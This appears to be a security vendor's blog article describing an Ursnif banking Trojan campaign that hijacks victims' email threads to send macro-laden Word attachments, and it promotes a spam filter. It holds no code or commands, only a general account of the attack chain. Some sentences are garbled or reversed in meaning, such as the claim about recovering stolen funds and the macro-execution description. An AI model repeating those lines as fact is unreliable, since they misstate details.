A new strain of the Ursnif banking Trojan has been identified and the actors to blame for the latest campaign have implemented a new tactic to spread the malware more quickly.
The Ursnif banking Trojan is one of the most often witnessed Trojans. As is the case with other banking Trojans, the purpose of the Ursnif Trojan is to take away credentials such as logins to banking websites, corporate bank details, and credit card information. The stolen credentials are then used to complete financial transactions. It is not unusual for accounts to be drained prior to the transactions being discovered, by which time the funds have cleared, have been withdrawn, and the criminal’s account has been closed. Recovering the stolen funds may not be impossible.
Infection will result in the malware stealing a wide range of sensitive data, capturing credentials as they are typed into the browser. The Ursnif banking Trojan also captures screenshots of the infected device and logs keystrokes. All of that information is silently shared to the hacker’s C2 server.
Banking Trojans can be put in place in a number of ways. They are often installed onto websites where they are downloaded in drive-by attacks. Traffic is sent d to the malicious websites using malvertising campaigns or spam emails contacting hyperlinks. Legitimate websites are compromised using brute force methods, and kits installed on the sites that attack people who have failed to keep their software up to date. In a lot of, software is shared using spam email, hidden in attachments.
Spam email has previously been used to share the Ursnif banking Trojan, and the most recent campaign is no different in that regard. However, the latest campaign uses a new tactic to increase the chance of infection and spread infections more quickly and widely. Financial institutions have been the main target of this banking Trojan, but with this most recent attack method they are far more widespread.
Infection will see the user’s contact list scanned and spear phishing emails sent to each of the user’s contacts. Since the spear phishing emails come from a trusted email account, the chances of the emails being opened is significantly heightened. Simply opening the email will not lead to infection. For that to take place, the recipient must click on the email attachment. Again, since it has come from a trusted person, that is more probably.
The actors to blame for this latest Ursnif banking Trojan campaign have another trick to increase trust and ensure their payload is sent. The spear phishing emails contain message threads from past communications. The email looks like a response to a previous email, and include details of past communications.
A short line of text is included as a attempt to get the recipient to open the email attachment – a Word document including a malicious macro. That macro needs to be authorized to run – if macros have not been set to run automatically, but it will not until the Word document is shut. When the macro is enabled, it initiates PowerShell commands that download the Ursnif Trojan, which then starts logging activity on the infected device and sends further spear phishing emails to the new victim’s contacts.
This is not an original tactic, but it is new to Ursnif – and it is likely to see infections spread much more swiftly. Additionally, the malware incorporates a number of additional tactics to hamper detection, allowing information to be stolen and bank accounts emptied before infection is discovered – the Trojan even erases itself once it has run.
Malware is always changing, and new tactics are constantly created to increase the likelihood of infection. The most recent campaign shows just how important it is to block email threats before they reach end users’ inboxes.
If you use an advanced spam filter like SpamTitan, malicious emails can be blocked to prevent them from reaching end user’s inboxes, greatly reducing the danger posed by malware infections.